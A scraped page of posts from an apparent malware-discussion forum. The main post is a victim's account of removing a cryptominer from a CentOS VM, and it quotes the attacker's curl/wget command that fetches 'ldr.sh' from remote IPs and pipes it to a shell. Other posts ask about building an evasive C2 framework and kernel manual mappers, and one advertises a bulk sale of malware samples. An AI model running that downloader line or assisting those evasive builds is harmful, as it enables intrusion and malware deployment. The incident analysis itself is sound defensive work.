A place for malware reports and information.
A place for malware reports and information for [anti]malware professionals and enthusiasts.
This is NOT a place for help with malware removal or any type of tech support. Ask your IT support staff, your search engine of choice, another subreddit (/r/antivirus or /r/techsupport for example), or a friend or relative. In that order.
You might also be interested in:
Chat with us:
A search online indicates this is a crypto mining malware that's been there since 2020. Probably related to 'threaddk'.
I encountered it on my digitalocean VM running Centos 7.9. I had set up the VM to test out some legacy app.
Most sources link this malware to postgre but in my case I don't even have postgresql installed, let alone running.
I suspect the vulnerability that was exploited was the old version of Java that I am using - JDK 1.6.
I found this when I ran htop (after I noticed lagging due to high cpu usage):
/usr/lib/jvm/java-1.6.0-openjdk-184.108.40.206.x86_64/jre/bin/java -classpath /tmp/~spawn1012433150472493028.tmp.dir metasploit.Payload
The tmp file had either been deleted or renamed. I couldn't find it.
Stopping this process didn't help..
As with the relatives, killing the kthreaddk processes just got them respawned.
The affected user was my ssh user (more on this later) so deleting the cron file just got it recreated.
To remove the cron successfully (hopefully), I did the following as root:
Mine was /var/spool/cron/[username] with only this one line.
* * * * * /home/[username]/.cache/pip/http/1/3/2/6/l7nj8o
Now I stopped kthreaddk processes
pkill -9 kthreaddk
My initial plan had been to kill all processes by the ssh user. This hadn't worked for some reason.
Not surprisingly, the file wasn't available. I ended up clearing my entire .cache folder just to be safe.
After that the malware seems to have been kicked out.
Further analysis:Now that the server was a lot more responsive I embarked on checking a few things:
a) ls -al /tmp revealed a hidden folder called .pwn
In it there was a binary file called bprofr. A bit of Google shows it is also malicious. Not sure if it's related to the kthreaddk. I deleted the file just as a precaution.
b) I had mentioned ssh user. I haven't logged into this server for over a month. So when I ssh'd into it I got weird errors. Like the ones you get when you paste random text into a shell by mistake.
So after stopping the malware I checked my .bashrc and bash_profile. They are both extremely compromised.
Warning: The contents are potentially harmful! Cautiion advised
I'll just post the .bash_history here:
(curl 220.127.116.11/ldr.sh?e39dc2||curl -k 18.104.22.168/ldr.sh?e39dc2||wget -O- 22.214.171.124/ldr.sh?e39dc2)|sh 1>/dev/null 2>&1 & ll pwd exit
I have not deleted the these files yet. I am tempted to log in again with the infected user to see if I can get the machine re-infected. The VM will be destroyed anyway as the testing is over.
Hello!I'm getting into malware analysis for a university assignment, and I'm currently comparing Wannacry and Petya.Wannacry went fine in the virtual machine for dynamic analysis, but Petya began to write to the boot file, and now my Hyper V Windows 10 VM gives me the error that it can't boot?
I've tried it twice, reverting to checkpoint and restarting but I get the same Hyper V issue:No operating system was loaded.
Does anyone know a fix by any chance?
Edit: Downgrading to Windows 7 fixed my issue, Petya now finally asks me to send it money
We covered analyzing an office document that has an embedded Macro code written in Visual Basic. The document was claimed to cause ransomware infection so we performed a static analysis including extracting relevant strings, calculating the MD5 hash, metadata and revealing the hidden Macro routine using tools such as olevba. Then we submitted the hash to online analysis engines such as VirusTotal and it was found to be malicious in that it executes a Powershell command that contacts c2 server to download further payloads. We also found instances of XOR encryption along with the XOR key which then used to decrypt a characters that were encoded previously into decimal form.
Video is here
Writeup is here
Hi folks, in this guide I will explain the PE format and how to parse it, all using rust.
I understand that Stuxnet is capable of spreading to non nuclear industrial control system,but after infecting a non nuclear control system why did it negatively impacted those control systems. It would have been like "I have code to hinder a nuclear centrifuge, but this machine seems to be control system of non nuclear factory and I have no clue what to do other than end of code reached".
Hey everyone, I am a cybersecurity student getting my B. Sc. at UoPX and am currently studying for my GIAC, Pentest+, and ISC2 CC. I recently got heavily interested in threat hunting and threat intelligence, as I have always had a fascination with the destructive effects of APTs on their targets.
I have been volunteering my free time when I am not studying to analyzing malware and reporting live IP callbacks to CISA, IC3, and reporting those IPs and domains on AbuseIPDB. I have reported groups like BlackMatter, and the people behind Agent Tesla recently and even done write-ups explaining to the public about these groups and their methods of attack.
I have been programming in 14 languages for 12 years but recently I also took on C/C++ to start developing and testing the effects of self-built malware on VMs (VirtualBox). I wanted to understand how much work and expertise these groups have and educate the public about how to mitigate the threats, to understand how TAs use things like self-made crypters, and how they obfuscate their malware in order to make it FUD or at least mostly FUD.
This helps people understand their methods, and I aim to eventually develop an IDS of my own to help fight these threats and detect them before they become so destructive.
Please note, I ABSOLUTELY am not for the destructive uses of malware programming, but until you have programmed something like what attackers use you cannot fully understand how complicated and the depth of their knowledge / skillset.
I am excited to take my certifications, and I am planning to volunteer for the VIRT program in my state soon to further my knowledge on defending against threats.
If one developed a C2 Framework with pretty good windows evasion, poly- and metamorphic engines what would make the most sense to do while developing it further
I have a collection of DOS viruses I want to experiment with on a VM but I'd like to know more information about these pieces of malware
Is there any sort of dos virus encyclopedia that I can get a description of payloads? I know some of these things are oddly specific and would like to get more info
Does any one have any good articles or blogs on creating a kernel manual mapper. I’ve read a few mappers like kdmapper and nullmapper, but I don’t understand them enough to go and find a vulnerable driver then make my own mapper. Any articles that could help me with this would be appreciated even if they arnt explicitly explaining how to make a manual mapper. Thx
AFAIK, most malware builders modify some type of information within a pre built stub to change their configuration. One way I have found is through Resources. One can modify and get Resources using simple WinAPI functions. What are the other ways?
I have been reverse engineering a piece of malware that attacked a friend of mine. Its a single executable around 70MB and upon loading it up I noticed that the majority of it is zero'ed out memory.
In a section called .ndata 60% of the program is interpreted like this:
0047b002 ?? ??
Which I'm assuming is either some unknown data type or the creators attempt of giving the executable enough size so that someone doesn't suspect the file size as it's supposed to be mocked up as a game.
I am quite new to ghidra and reverse engineering so if I've misinterpreted what this could be then please let me know, what do other people interpret this as?
Assuming the devices have no malware on them.
Take an old iPod Nano or handheld device that can listen to local radio stations but can't go online, have no Bluetooth, etc. Pretend Snowden has one and he's listening to it as he walks around. If a team of NSA/CIA agents are physically following him or physically trying to locate him, is there any signal or identifying signal emanating from his device that can identify him, pinpoint him, or be used to follow him or locate him while he just listens to local radio? Could an adversary somehow send malware to his device via FM/AM radio?
Same questions but for an iPod Touch in airplane mode. And a laptop in airplane mode. And a smartphone in airplane mode.
I understand there are many variations, complexities, and firmware risks involved as well. But my question is more about what's going on via hardware and firmware when such devices are in airplane mode without having malware on the main OS at least. As well as whether bare bones devices like an old iPod Nano (without any malware) can be subject to tracking or exploitation via passive radio receiver or some other way.
Does anyone know anymore about this ransom ware?
All I can find on them is this article. https://www.sentinelone.com/anthology/gazprom/
37,745 APT papers and samples
7,147 archived materials (papers, old software, malware builders)
11,460 malware papers
36,000,000+ malware samples (5.06TB)
3,197 malware source code(s) file(s)
$500 (this includes shipping)
Handwritten thank you letter
10TB Seagate external HDD
Delivery times vary (location, queue, ???)
Anyone know any good interactive tutorials for learning C / C++. I am wanting to learn to one or both of those programming languages to get started on Mal analysis / RE. I know a few sites to learn but the whole "read 37 pages and then try it yourself without any examples or guidance" is not a very fun route to go for starting out. I feel like I would enjoy that more later on as an intermediate programmer.
Hey - I am conducting a research project that involves looking at how much energy some malware forms take, and I want to focus specifically on energy eating malware types, like cryptominers. Where could I download such malware sample forms to help me with this research?
Thanks for the help
I am a newbie in the filed and I wish to learn more
I am currently finishing the TCM-Security practical malware analysis and triage course
And I wish to learn more
what free/paid resources do you suggest?